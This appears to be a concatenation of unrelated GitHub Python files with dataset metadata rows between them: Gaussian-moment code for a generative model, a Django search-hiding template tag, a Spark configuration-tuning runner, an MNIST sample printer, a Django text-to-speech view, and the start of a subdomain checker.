    if ineqs.shape[0] <= ineqs.shape[1] - 1:
        # at most D-1 constraints: the region is already a single cone
        simplices = [range(len(ineqs))]
    else:
        v = np.array(get_vertices(ineqs))[:, 1:]
        simplices = get_simplices(v)
    for simplex in simplices:
        cones = [(ineqs, 1)] if ineqs.shape[0] <= ineqs.shape[1] - 1 else zip(*simplex_to_cones(v[simplex]))
        for ineqs_c, s in cones:
            # rotate each cone into a rectangular domain for mvn integration
            l_c, R_c = cones_to_rectangle(ineqs_c, cov_w)
            cov_c = R_c.dot(cov_w.dot(R_c.T))
            f, G = get_F_G(l_c, cov_c)
            phi0 += s * mvstdnormcdf(l_c, cov_c)
            phi1 += s * R_c.T.dot(f)  # THIS SHOULD BE CHANGED BELOW FOR S>1
            # NOTE: G is currently unused -- the second-order correction
            # term was commented out in the original.
            H = np.diag(np.nan_to_num(l_c) * f / np.diag(cov_c))
            phi2 += s * R_c.T.dot(H.dot(R_c))
    # shift the centered moments back to mean mu
    phi1 = cov_w.dot(phi1)
    phi2 = (cov_w + np.outer(mu, mu)) * phi0 + cov_w.dot(phi2.dot(cov_w))\
        + np.outer(mu, phi1) + np.outer(phi1, mu)
    phi1 += mu * phi0
    return phi0, phi1, phi2
def phis_all(ineqs, mu_all, cov_all):
    """Stack phis_w over all regions; returns arrays (phi0, phi1, phi2)."""
    n_regions = len(ineqs)
    dim = cov_all.shape[-1]
    phi0 = np.zeros(n_regions)
    phi1 = np.zeros((n_regions, dim))
    phi2 = np.zeros((n_regions, dim, dim))
    for i, (ineq, mu, cov) in enumerate(zip(ineqs, mu_all, cov_all)):
        phi0[i], phi1[i], phi2[i] = phis_w(ineq, mu, cov)
    return phi0, phi1, phi2
############################# kappa computations
def log_kappa(x, cov_x, cov_z, A, b):
    """Per-region log evidence of ``x`` under N(b_r, cov_x + A_r cov_z A_r^T).

    Returns an array of shape (N, n_regions)."""
    cov = cov_x + np.einsum('nds,sp,nkp->ndk', A, cov_z, A)
    kappas = np.array([multivariate_normal.logpdf(x, mean=m, cov=c)
                       for m, c in zip(b, cov)])
    # logpdf squeezes the sample axis when N == 1, so rebuild the 2-D shape
    return kappas[None, :] if x.shape[0] == 1 else kappas.T
##################################
def posterior(z, regions, x, As, Bs, cov_z, cov_x, input2signs):
# Posterior density p(z | x) of the latent variable: a mixture of
# truncated Gaussians, one per region, weighted by kappa (evidence) and
# normalized by sum_r kappa_r * phi0_r.  Assumes a single data point x.
mu, cov = mu_sigma(x, As, Bs, cov_z, cov_x)
kappas = np.exp(log_kappa(x, cov_x, cov_z, As, Bs))[0]
phis0 = phis_all([regions[r]['ineq'] for r in regions], mu[0], cov)[0]
indices = find_region(z, regions, input2signs)
output = np.zeros(len(indices))
# evaluate each region's Gaussian only on the z points that fall in it
for k in np.unique(indices):
w = indices == k
output[w] = multivariate_normal.pdf(z[w], mean=mu[0, k], cov=cov[k])
output *= kappas[indices] / (kappas * phis0).sum()
return output
############################## ALGO 2
def marginal_moments(x, regions, cov_x, cov_z):
    """Compute the marginal likelihood p(x) and the per-region moments
    (m0, m1, m2) of the latent posterior for every data point.

    Bug fix: removed a leftover debug ``print`` of intermediate shapes.
    """
    # find all regions of the DN
    As = np.array([regions[s]['Ab'][0] for s in regions])
    Bs = np.array([regions[s]['Ab'][1] for s in regions])
    # find all mus and cov (cov is constant per x, not mus)
    mus, covs = mu_sigma(x, As, Bs, cov_z, cov_x)  # (N n D) (n D D)
    log_kappas = log_kappa(x, cov_x, cov_z, As, Bs)  # (N n)
    ineqs = np.array([regions[r]['ineq'] for r in regions])
    P0, P1, P2 = [], [], []
    for mu in tqdm(mus, desc='Computing PHIS'):
        p0, p1, p2 = phis_all(ineqs, mu, covs)
        P0.append(p0)
        P1.append(p1)
        P2.append(p2)
    phis = [np.array(P0), np.array(P1), np.array(P2)]
    # floor the mass terms to avoid log(0) / division by zero below
    phis[0] = np.maximum(phis[0], 1e-30)
    # NOTE(review): elementwise maximum with 1e-30*I also clamps every
    # off-diagonal entry of the second moments to >= 0, zeroing negative
    # cross terms -- confirm this regularization is intended.
    phis[2] = np.maximum(phis[2], 1e-30 * np.eye(len(cov_z)))
    # compute marginal
    px = np.exp(lse(log_kappas + np.log(phis[0]), axis=1))  # (N)
    # per-region responsibilities via a max-stabilized softmax
    alphas = np.exp(log_kappas - log_kappas.max(1, keepdims=True))\
        / (np.exp(log_kappas - log_kappas.max(1, keepdims=True)) * phis[0]).sum(1, keepdims=True)
    m0_w = phis[0] * alphas
    m1_w = phis[1] * alphas[:, :, None]
    m2_w = phis[2] * alphas[:, :, None, None]
    return px, m0_w, m1_w, m2_w
| RandallBalestriero/EMDGN | utils_old.py | utils_old.py | py | 15,737 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "sys.path.insert",
"line_number": 2,
"usage_type": "call"
},
{
"api_name": "sys.path",
"line_number": 2,
"usage_type": "attribute"
},
{
"api_name": "numpy.concatenate",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "numpy.cumsum",
"lin... |
40829037969 | from base64 import b64encode
from django import template
# CSS class attached to every placeholder div (must match the unhide.js
# selector emitted by post_shide).
CSS_CLASS = 'dj-special-block'
# localStorage key template; formatted with a per-block counter.
KEY_PREFIX = 'dj-special-{}'
# module-level counter giving each rendered block a unique key
block_count = 0
register = template.Library()
class ShideNode(template.Node):
    """Renders the wrapped template content as an empty placeholder div plus
    a script that stashes the base64-encoded content in localStorage under a
    unique per-block key (so search engines don't index it)."""
    template = "<div class=\"%s\" id=\"{key_name}\"></div>"\
               "<script>localStorage.setItem('{key_name}', '{data}');</script>" % CSS_CLASS

    def __init__(self, nodelist):
        self.nodelist = nodelist

    def render(self, context):
        # Bug fix: 'global' is required -- the bare 'block_count += 1' made
        # the name local, so reading it in format() below raised
        # UnboundLocalError on every render.
        global block_count
        output = self.nodelist.render(context)
        # Bug fix: b64encode takes bytes and returns bytes; encode/decode so
        # the emitted HTML contains plain base64 text instead of "b'...'".
        prepared_output = self.template.format(
            key_name=KEY_PREFIX.format(block_count),
            data=b64encode(output.encode('utf-8')).decode('ascii'))
        block_count += 1
        return prepared_output
def do_shide(parser, token):
    """Template-tag compiler for {% shide %} ... {% endshide %} blocks."""
    inner_nodes = parser.parse(('endshide',))
    parser.delete_first_token()  # consume the {% endshide %} token
    return ShideNode(inner_nodes)
@register.simple_tag
def post_shide():
    """Return the inline un-hide script (minified version of the repo-root
    unhide.js).

    Bug fix: the original called ``str.format`` on a template full of
    literal JavaScript braces, which raises at runtime (every ``{`` starts a
    replacement field); the single placeholder is now substituted with
    ``str.replace`` instead.
    """
    script = """<script>(function(){'use strict';let $blocks=document.querySelectorAll('.{css_name}');$blocks.forEach(function($oneBlock){$oneBlock.innerHTML=window.atob(localStorage.getItem($oneBlock.getAttribute('id')))})})();</script>"""
    return script.replace('{css_name}', CSS_CLASS)
| xfenix/django-search-hide | searchhide/templatetags/searchhide.py | searchhide.py | py | 1,199 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.template.Library",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "django.template",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.template.Node",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "djang... |
38975372598 | import shell_content
import os
import time
import signal
import subprocess
import numpy as np
import pydoop.hdfs as hdfs
import json
# Spark parameters being tuned (order matches the vector consumed by
# get_conf_str below).
spark_conf_names = ['spark.default.parallelism', 'spark.driver.cores', 'spark.driver.memory',
                    'spark.driver.maxResultSize',
                    'spark.executor.instances', 'spark.executor.cores', 'spark.executor.memory',
                    'spark.executor.memoryOverhead',
                    'spark.files.maxPartitionBytes', 'spark.memory.fraction', 'spark.memory.storageFraction',
                    'spark.reducer.maxSizeInFlight',
                    'spark.shuffle.compress', 'spark.shuffle.file.buffer', 'spark.shuffle.spill.compress']

# Benchmark workload names.
AppName = ['ConnectedComponent', 'DecisionTree', 'KMeans', 'LabelPropagation', 'LinearRegression',
           'LogisticRegression', 'PageRank',
           'PCA', 'PregelOperation', 'ShortestPaths', 'StronglyConnectedComponent', 'SVDPlusPlus', 'SVM', 'Terasort',
           'TriangleCount']

# Discrete choices for spark.driver.maxResultSize.
result_sizes = ['200m', '500m', '1g', '2g', '4g']

last_log = ""


def get_conf_str(params):
    """Translate a 15-dimensional configuration vector into the '--conf'
    argument string passed to spark-submit.

    Encodings: memory fractions are tenths, memoryOverhead is in 512 MB
    units, maxPartitionBytes in 64 MB units, maxSizeInFlight/file.buffer in
    32 (MB/KB) units, booleans index ['true', 'false'].
    """
    (executor_cores, executor_num, mem_fraction, executor_mem,
     parallelism_vals, driver_cores, driver_mem, driver_maxResultSize,
     executor_memoryOverhead, files_maxPartitionBytes, mem_storageFraction,
     reducer_maxSizeInFlight, shuffle_compress, shuffle_file_buffer,
     shuffle_spill_compress) = params
    # executor_memoryOverhead = 16 - executor_mem
    bool_vals = ['true', 'false']
    parts = [
        f' --conf "spark.executor.cores={executor_cores}" ',
        f' --conf "spark.executor.memory={executor_mem}g" ',
        f' --conf "spark.executor.instances={executor_num}" ',
        f' --conf "spark.memory.fraction={float(mem_fraction) / 10}" ',
        f'--conf "spark.default.parallelism={parallelism_vals}" ',
        f'--conf "spark.driver.cores={driver_cores}" ',
        f'--conf "spark.driver.memory={driver_mem}g" ',
        f'--conf "spark.driver.maxResultSize={result_sizes[int(driver_maxResultSize)]}" ',
        f'--conf "spark.executor.memoryOverhead={executor_memoryOverhead * 512}m" ',
        f'--conf "spark.files.maxPartitionBytes={files_maxPartitionBytes * 64}m" ',
        f'--conf "spark.memory.storageFraction={float(mem_storageFraction) / 10}" ',
        f'--conf "spark.reducer.maxSizeInFlight={reducer_maxSizeInFlight * 32}m" ',
        f'--conf "spark.shuffle.compress={bool_vals[int(shuffle_compress)]}" ',
        f'--conf "spark.shuffle.file.buffer={shuffle_file_buffer * 32}k" ',
        f'--conf "spark.shuffle.spill.compress={bool_vals[int(shuffle_spill_compress)]}" ',
        f'--conf "spark.network.timeout={300}" ',
    ]
    return ''.join(parts)
def get_shell_file(shell_file_path, params, workload_num):
    """Write a spark-bench run script for workload `workload_num` to `shell_file_path`.

    The script is the workload's boilerplate front section, a spark-submit
    invocation carrying the --conf flags built from `params`, then the rear
    section.
    """
    # `with` guarantees the script is flushed and closed before it is executed
    # (the original left the handle open, risking a partially written script).
    with open(shell_file_path, 'w', encoding='utf-8') as shell_file:
        shell_file.write(shell_content.front[workload_num])
        shell_file.write(
            ''' echo_and_run sh -c " ${SPARK_HOME}/bin/spark-submit --class $CLASS \
    --master ${APP_MASTER} ${SPARK_RUN_OPT} ''' +
            get_conf_str(params) + ''' $JAR ${OPTION} 2>&1|tee ${BENCH_NUM}/${APP}_run_${START_TS}.dat"''')
        shell_file.write(shell_content.rear)
def run_command(cmd_string, timeout=100):
    """Run a shell command and return ``(code, msg)``.

    ``code`` is 0 on success and 1 on failure or timeout.  On timeout every
    running YARN application is killed and the whole process group spawned
    for the command is terminated.
    """
    p = subprocess.Popen(cmd_string, stderr=subprocess.STDOUT, stdout=subprocess.PIPE,
                         shell=True, close_fds=True, start_new_session=True)
    try:
        (msg, errs) = p.communicate(timeout=timeout)
        ret_code = p.poll()
        if ret_code:
            code = 1
            msg = "[Error]Called Error : " + str(msg.decode('utf-8'))
        else:
            code = 0
            # Raw stdout is discarded on success; report a short status instead.
            msg = "finished successfully"
    except subprocess.TimeoutExpired:
        # Kill any YARN applications the benchmark may have launched, then the
        # whole process group (start_new_session made `p` a session leader).
        os.system("for i in `yarn application -list | awk '{print $1}' | grep application_`; do yarn application -kill $i; done ")
        p.kill()
        p.terminate()
        os.killpg(p.pid, signal.SIGTERM)
        code = 1
        msg = "[ERROR]Timeout Error : Command '" + cmd_string + "' timed out after " + str(timeout) + " seconds"
    except Exception as e:
        code = 1
        msg = "[ERROR]Unknown Error : " + str(e)
    return code, msg
def read_log(workload):
    """Aggregate per-stage I/O counters from the Spark event log ``log/<workload>``.

    For every SparkListenerTaskEnd event, accumulate per stage:
    ``[input bytes read, output bytes written, shuffle bytes read, shuffle bytes written]``.

    Returns
    -------
    tuple
        (number of stages seen, list of the four per-stage byte totals)
    """
    all_stage_info = {}
    # `with` closes the log file even on early break (the original leaked it).
    with open("log/" + workload, 'r', encoding='utf-8') as log:
        for line in log:
            try:
                line_json = json.loads(line)
            except ValueError:
                # Event logs occasionally contain truncated/non-JSON lines.
                print('json错误')
                continue
            # shuffle read/write、input/output
            if line_json['Event'] != 'SparkListenerTaskEnd':
                continue
            cur_stage = line_json['Stage ID']
            if cur_stage not in all_stage_info:
                all_stage_info[cur_stage] = [0, 0, 0, 0]
            try:
                metrics = line_json['Task Metrics']
                all_stage_info[cur_stage][0] += metrics['Input Metrics']['Bytes Read']
                all_stage_info[cur_stage][1] += metrics['Output Metrics']['Bytes Written']
                all_stage_info[cur_stage][2] += (metrics['Shuffle Read Metrics']['Remote Bytes Read'] +
                                                 metrics['Shuffle Read Metrics']['Local Bytes Read'])
                all_stage_info[cur_stage][3] += metrics['Shuffle Write Metrics']['Shuffle Bytes Written']
            except KeyError:
                # Metrics schema differs from what we expect; stop scanning.
                print('metrics key error')
                break
    return len(all_stage_info.values()), list(all_stage_info.values())
def get_rs(action):
    """Return the wall-clock duration (seconds) of the most recent Spark run.

    Fetches the newest event log under /history/ on HDFS.  Returns 10000 as a
    penalty value when no new log appeared since the previous call (the run
    produced no history entry) or when start/end timestamps are missing.
    `action` is only echoed for debugging next to the applied Spark confs.
    """
    # find log
    his_file_list = hdfs.ls("/history/")
    log_path = his_file_list[-1]  # newest entry; assumes ls order is chronological — TODO confirm
    global last_log
    if last_log == log_path:
        # Same log as last time: the submitted run produced no new history file.
        return 10000
    last_log = log_path
    print("Application:" + last_log)
    log_file = hdfs.open(log_path, 'rt', encoding='utf-8')
    start_timestamp = None
    end_timestamp = None
    for line in log_file:
        try:
            line_json = json.loads(line)
        except:
            print('json错误')
            continue
        if line_json['Event'] == 'SparkListenerEnvironmentUpdate':
            # Echo the Spark conf values actually applied so they can be
            # cross-checked against the requested `action`.
            spark_props = line_json['Spark Properties']
            s = ''
            for conf_name in spark_conf_names:
                s = s + spark_props[conf_name] + ", "
            print()
            print(s)
            print(action)
            print()
        if line_json['Event'] == 'SparkListenerApplicationStart':
            start_timestamp = line_json['Timestamp']
        if line_json['Event'] == 'SparkListenerApplicationEnd':
            end_timestamp = line_json['Timestamp']
        if line_json['Event'] == 'SparkListenerJobEnd':
            if line_json['Job Result']['Result'] != 'JobSucceeded':
                # A job failed: stop scanning, the run is not a valid sample.
                break
    if start_timestamp and end_timestamp:
        # Timestamps are epoch milliseconds.
        duration = float(int(end_timestamp) - int(start_timestamp))/1000
    else:
        return 10000
    return duration
def run_bench(workload, params):
    """Generate the run script for `workload` using `params` and execute it."""
    workload_idx = AppName.index(workload)
    # spark-bench legacy installation root on the driver host.
    bench_root = "/home/spark_user/lib/spark-bench-legacy/"
    script_path = bench_root + workload + "/bin/my-run.sh"
    get_shell_file(script_path, params, workload_idx)
    code, msg = run_command("bash " + script_path, timeout=600)
    # Give YARN/HDFS a moment to flush the event log before it is read back.
    time.sleep(10)
if __name__ == "__main__":
run_bench("LinearRegression",[1, 1, 1, 1, 1, 1, 1, 0, 4, 1, 1, 1, 0, 1, 0]) | TsinghuaDatabaseGroup/AI4DBCode | Spark-Tuning/prediction_nn/run_action.py | run_action.py | py | 8,108 | python | en | code | 56 | github-code | 1 | [
{
"api_name": "shell_content.front",
"line_number": 55,
"usage_type": "attribute"
},
{
"api_name": "shell_content.rear",
"line_number": 60,
"usage_type": "attribute"
},
{
"api_name": "subprocess.Popen",
"line_number": 63,
"usage_type": "call"
},
{
"api_name": "sub... |
15859503196 | from crypt import methods
from flask import Flask , render_template, request, make_response
from werkzeug.wrappers import Response
import os
from .healpers.CsvHealper import allowed_file, parse_user_file, generate_file
def create_app():
    """Build the Flask application, taking the secret key from the environment."""
    application = Flask(__name__)
    application.secret_key = os.environ["Secret"]
    return application
app = create_app()
@app.route("/")
def hello_world():
    """Render the CSV-upload form (index page)."""
    return render_template("index.html")
@app.route("/upload", methods=['post'])
def handlecsv():
try:
if request.method == 'POST':
# check if the post request has the file part
if 'file' not in request.files:
return render_template("index.html", error = 'No file part' )
file = request.files['file']
# If the user does not select a file, the browser submits an
# empty file without a filename.
if file.filename == '':
return render_template("index.html", error = 'No selected file' )
if file and allowed_file(file.filename):
data = parse_user_file(file)
if type(data) ==list:
# stream the response as the data is generated
response = Response(generate_file(data), mimetype='text/csv')
# add a filename
response.headers.set("Content-Disposition", "attachment", filename=f"{file.filename}-transformed.csv")
return response
else:
return render_template("index.html", error = f"error while reading the file : {data}" )
else:
return render_template("index.html", error = 'format not supported, please upload csv file' )
except Exception as e:
return make_response({'message': f'error {e}'},500) | Maminebouzid/flask_upload_csv | app/__init__.py | __init__.py | py | 2,028 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.environ",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "flask.render_template",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "flask.request.method... |
72133950755 | #!/usr/bin/python3
# 9-model_state_filter_a.py
"""Script that lists all State that contains the letter a
from the database hbtn_0e_6_usa
"""
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from model_state import Base, State
from sys import argv
def firstState():
    """Print every State from hbtn_0e_6_usa whose name contains the letter 'a'.

    Database credentials and name are taken from sys.argv[1:4].
    """
    # NOTE(review): the name is misleading — this lists all matching states,
    # not just the first one.
    engine = create_engine('mysql+mysqldb://{}:{}@localhost:3306/{}'.format(
        argv[1],
        argv[2],
        argv[3]),
        pool_pre_ping=True)
    Base.metadata.create_all(engine)
    Session = sessionmaker(bind=engine)
    session = Session()
    # contains("a") maps to SQL LIKE '%a%' on State.name.
    states = session.query(State).filter(State.name.contains("a"))
    for state in states:
        print("{}: {}".format(state.id, state.name))
    session.close()
if __name__ == '__main__':
    # Run only when executed as a script; credentials come from sys.argv.
    firstState()
| jonseb974/holbertonschool-higher_level_programming | python-object_relational_mapping/9-model_state_filter_a.py | 9-model_state_filter_a.py | py | 804 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "sqlalchemy.create_engine",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "sys.argv",
"line_numbe... |
17407487909 | import gtk
import thermo
class SteamSolver:
def __init__(self):
'''Initial window which has a combo box from which the user can choose either of temperature and pressure'''
self.window = gtk.Window(gtk.WINDOW_TOPLEVEL)
self.window.set_size_request(500 , 500)
self.window.set_title('Steam Solver')
self.window.connect('delete-event' , gtk.main_quit)
self.window.modify_bg(gtk.STATE_NORMAL , gtk.gdk.Color(red = 20000, blue = 20000 , green = 20000))
self.TableCreator()
def TableCreator(self):
self.PropertyList =['Pressure' , 'Temperature' , 'Volume(v)' , 'Energy(u)' ,'Enthalpy(h)' , 'Entropy(s)' , 'Quality(x)']
self.FinalList = []
self.table = gtk.Table(500 ,500 , True)
self.label = gtk.Label('Choose any one')
self.table.attach(self.label , 25 , 225 , 25 , 60 )
self.box = gtk.combo_box_new_text()
self.box.append_text('Pressure')
self.box.append_text('Temperature')
self.box.connect('changed' , self.PresTemp)
self.table.attach(self.box , 275 , 450 , 25 , 60)
self.window.add(self.table)
self.window.show_all()
def _helper(self , FinalList):
try:
Property1 = self.PresTempEnt.get_text()
Property2 = self.PropertyEntry.get_text()
if FinalList[0] == 'P':
if FinalList[1] == 'Temperature':
a = thermo.State(P = float(Property1), T = float(Property2))
return a
elif FinalList[1] == 'Volume(v)':
a = thermo.State(P = float(Property1), v = float(Property2))
return a
elif FinalList[1] == 'Energy(u)':
a = thermo.State(P = float(Property1), u = float(Property2))
return a
elif FinalList[1] == 'Enthalpy(h)':
a = thermo.State(P = float(Property1), h = float(Property2))
return a
elif FinalList[1] == 'Entropy(s)':
a = thermo.State(P = float(Property1), s = float(Property2))
return a
elif FinalList[1] == 'Quality(x)':
a = thermo.State(P = float(Property1), x = float(Property2))
return a
if FinalList[0] == 'T':
if FinalList[1] == 'Volume(v)':
a = thermo.State(P = float(Property1), v = float(Property2))
return a
elif FinalList[1] == 'Energy(u)':
a = thermo.State(P = float(Property1), u = float(Property2))
return a
elif FinalList[1] == 'Enthalpy(h)':
a = thermo.State(P = float(Property1), h = float(Property2))
return a
elif FinalList[1] == 'Entropy(s)':
a = thermo.State(P = float(Property1), s = float(Property2))
return a
elif FinalList[1] == 'Quality(x)':
a = thermo.State(P = float(Property1), x = float(Property2))
return a
except ValueError:
a = 'Error'
return a
def PresTemp(self , widget):
'''Function called when the combo box is changed , the window gets another label and an
entry into which the user can tpe the required value of temperature and pressure'''
index = widget.get_active()
widget.destroy()
self.Entry1 = gtk.Entry()
self.table.attach(self.Entry1 , 275 , 450 , 25 , 60)
self.PresTempLab = gtk.Label()
self.PresTempEnt = gtk.Entry()
self.table.attach(self.PresTempLab , 25 , 225 , 120 , 155)
self.table.attach(self.PresTempEnt , 275 , 450 , 120 , 155)
if index == 0:
self.FinalList.append('P')
self.PropertyList.remove('Pressure')
self.PresTempLab.set_text('Enter Pressure')
self.Entry1.set_text('Pressure')
self.Entry1.set_editable(False)
else:
self.FinalList.append('T')
self.PropertyList.remove('Temperature')
self.PresTempLab.set_text('Enter Temperature')
self.Entry1.set_text('Temperature')
self.Entry1.set_editable(False)
self.button = gtk.Button('Process')
self.button.connect('clicked' , self.Process , index)
self.table.attach(self.button , 200 , 300 , 420 , 480)
self.window.show_all()
def Process(self , widget , index):
'''Function called by the button Process , Checks whether the input is valid or not
If the input is valid , then another label and a combo box are added. The user can
choose any other property other then temperature or pressure which was entered'''
UserEntry = self.PresTempEnt.get_text()
self.PresTempEnt.set_editable(False)
widget.destroy()
self.SecondStateLab = gtk.Label('Enter Second Property')
self.Combo = gtk.combo_box_new_text()
for Property in self.PropertyList:
self.Combo.append_text(Property)
self.Combo.connect('changed' , self.SecState)
self.table.attach(self.SecondStateLab , 25 , 225 , 215 , 250)
self.table.attach(self.Combo , 275 , 450 , 215 , 250)
self.window.show_all()
def SecState(self , widget):
self.index = widget.get_active()
self.PropertyEntry = gtk.Entry()
self.PropertyLabel = gtk.Label('Enter ' + self.PropertyList[self.index])
self.FinalList.append(self.PropertyList[self.index])
widget.destroy()
self.OptionsLabel = gtk.Entry()
self.OptionsLabel.set_text(self.PropertyList[self.index])
self.OptionsLabel.set_editable(False)
self.table.attach(self.OptionsLabel , 275 , 450 , 215 , 250)
self.table.attach(self.PropertyLabel , 25 , 225 , 310 , 345)
self.table.attach(self.PropertyEntry , 275 , 450 , 310 , 345)
self.button2= gtk.Button('Process')
self.button2.connect('clicked' , self.FinalState)
self.table.attach(self.button2 , 200 , 300 , 420 , 480)
self.window.show_all()
def FinalState(self , widget):
widget.set_label('Reset')
a = self._helper(self.FinalList)
self.label.destroy()
self.PresTempLab.destroy()
self.PresTempEnt.destroy()
self.Entry1.destroy()
self.PropertyEntry.destroy()
self.PropertyLabel.destroy()
self.OptionsLabel.destroy()
self.SecondStateLab.destroy()
if a == 'Error':
self.warning = gtk.Label('P L E A S E E N T E R V A L I D I N P U T')
self.table.attach(self.warning , 25 , 475 , 25 , 375)
self.window.show_all()
else:
self.TemperatureEntry = gtk.Entry()
self.TemperatureLabel = gtk.Label('Temperature')
self.PressureEntry = gtk.Entry()
self.PressureLabel = gtk.Label('Pressure')
self.table.attach(self.TemperatureLabel, 25 , 225 , 25 , 55)
self.table.attach(self.TemperatureEntry , 275 , 450 , 25 , 55)
self.TemperatureEntry.set_text(str(a.GetTemp()))
self.TemperatureEntry.set_editable(False)
self.table.attach(self.PressureLabel, 25 , 225 , 75 , 105)
self.table.attach(self.PressureEntry , 275 , 450 , 75 , 105)
self.PressureEntry.set_text(str(a.GetPressure()))
self.PressureEntry.set_editable(False)
self.VolumeEntry = gtk.Entry()
self.VolumeLabel = gtk.Label('Volume(v):')
self.table.attach(self.VolumeLabel, 25 , 225 , 125 , 155)
self.table.attach(self.VolumeEntry , 275 , 450 , 125 , 155)
self.VolumeEntry.set_text(str(a.GetVolume()))
self.VolumeEntry.set_editable(False)
self.EnergyEntry = gtk.Entry()
self.EnergyLabel = gtk.Label('Internal Energy(U):')
self.table.attach(self.EnergyLabel, 25 , 225 , 175 , 205)
self.table.attach(self.EnergyEntry , 275 , 450 , 175 , 205)
self.EnergyEntry.set_text(str(a.GetEnergy()))
self.EnergyEntry.set_editable(False)
self.EnthalpyEntry = gtk.Entry()
self.EnthalpyLabel = gtk.Label('Enthalpy(H):')
self.table.attach(self.EnthalpyLabel, 25 , 225, 225 , 255)
self.table.attach(self.EnthalpyEntry , 275 , 450 , 225 , 255)
self.EnthalpyEntry.set_text(str(a.GetEnthalpy()))
self.EnthalpyEntry.set_editable(False)
self.EntropyEntry = gtk.Entry()
self.EntropyLabel = gtk.Label('Entropy(s):')
self.table.attach(self.EntropyLabel, 25 , 225 , 275 , 305)
self.table.attach(self.EntropyEntry , 275 , 450 , 275 , 305)
self.EntropyEntry.set_text(str(a.GetEntropy()))
self.EntropyEntry.set_editable(False)
self.QualityEntry = gtk.Entry()
self.QualityLabel = gtk.Label('Quality(x):')
self.table.attach(self.QualityLabel, 25 , 225 , 325 , 355)
self.table.attach(self.QualityEntry , 275 , 450 ,325 , 355)
self.QualityEntry.set_text(str(a.GetQuality()))
self.QualityEntry.set_editable(False)
self.window.show_all()
widget.connect('clicked' , self.destroy)
def destroy(self , widget):
self.table.destroy()
self.TableCreator()
class main:
    # NOTE(review): this "class" is used as a script entry point — its body
    # executes at class-definition time (i.e. on import), launching the GUI
    # immediately; calling main() afterwards just re-instantiates an empty object.
    SteamSolver()
    gtk.main()
if __name__ == '__main__':
    # The GUI already started when `class main` was defined above; this call
    # only instantiates the (empty) class.
    main()
| MechCoder/Steam-Solver | Steamsolver.py | Steamsolver.py | py | 9,908 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "gtk.Window",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "gtk.WINDOW_TOPLEVEL",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "gtk.main_quit",
"line_number": 13,
"usage_type": "attribute"
},
{
"api_name": "gtk.STATE_NORM... |
19926976795 | import keras
from keras.datasets import mnist
from keras.models import load_model
def Getdata():
    """Print the first MNIST test image (normalized 28x28) and its one-hot label.

    Values are emitted in a C-style "%.6f , " layout, one image row per line,
    suitable for pasting into embedded source code.
    """
    (x_train, y_train), (x_test, y_test) = mnist.load_data()
    x_train = x_train.reshape(x_train.shape[0], 28, 28, 1)
    x_test = x_test.reshape(x_test.shape[0], 28, 28, 1)
    x_train = x_train / 255
    x_test = x_test / 255
    y_train = keras.utils.to_categorical(y_train, 10)
    y_test = keras.utils.to_categorical(y_test, 10)
    sample = x_test[0].reshape(-1)
    label = y_test[0]
    for row in range(28):
        print("".join("%.6f , " % sample[row * 28 + col] for col in range(28)))
    print(label)
Getdata() | Sun2018421/keras-Lenet-5 | getDataforEmbedded.py | getDataforEmbedded.py | py | 635 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "keras.datasets.mnist.load_data",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "keras.datasets.mnist",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "keras.utils.to_categorical",
"line_number": 13,
"usage_type": "call"
},
{
"api_... |
18900639652 | from django.shortcuts import render
from django.http import HttpResponse
from django.template import RequestContext
from .forms import Mp3DetailsForm
from gtts import gTTS
import os
import time
def index(request):
    """Render the TTS form (GET) or synthesize and return the MP3 (POST).

    A valid POST responds with the generated MP3 as an attachment; an invalid
    form falls back to the creation page.
    """
    if request.method == 'POST':
        context = RequestContext(request)
        aform = Mp3DetailsForm(request.POST)
        if aform.is_valid():
            file_name = aform.cleaned_data['file_name'].replace(" ", "")
            text = aform.cleaned_data['text']
            create_sound(file_name, text)
            # NOTE(review): machine-specific hard-coded path — should come from
            # settings/MEDIA_ROOT.
            file_path = '/Users/ivanG/Documents/text_to_speech/Text_to_Speech/' + file_name + ".mp3"
            # Wait until gTTS has written the file (the original also had a
            # redundant exists/break check inside this loop).
            while not os.path.exists(file_path):
                time.sleep(1)
            print("file about to be opened")
            # BUG FIX: open in binary mode — reading an MP3 in text mode would
            # corrupt it or raise a UnicodeDecodeError.
            fsock = open(file_path, 'rb')
            response = HttpResponse(fsock, content_type='audio/mpeg')
            response['Content-Disposition'] = "attachment; filename=%s.mp3" % file_name
            return response
        else:
            aform = Mp3DetailsForm()
            return render(request, 'tts/createmp3.html')
    else:
        form = Mp3DetailsForm()
        context = RequestContext(request)
        return render(request, 'tts/index.html', {'form': form})
def create_sound(file_name, text):
    """Synthesize `text` to `<file_name>.mp3` via Google TTS; return the gTTS object."""
    speech = gTTS(text=text, lang='en')
    speech.save(file_name + ".mp3")
    return speech
| me12722/text-to-speech | Text_to_Speech/tts/views.py | views.py | py | 1,449 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "django.template.RequestContext",
"line_number": 15,
"usage_type": "call"
},
{
"api_name": "forms.Mp3DetailsForm",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "os.path.exists",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "os... |
6517886216 | #Tool check active subdomain from amass result
from concurrent.futures import ThreadPoolExecutor
import requests
from requests.exceptions import ConnectionError
import argparse
# CLI: -i/--input_file is the amass subdomain list (one URL per line);
# -o/--output-file collects the subdomains that respond.
parser = argparse.ArgumentParser(description='Example argument parser')
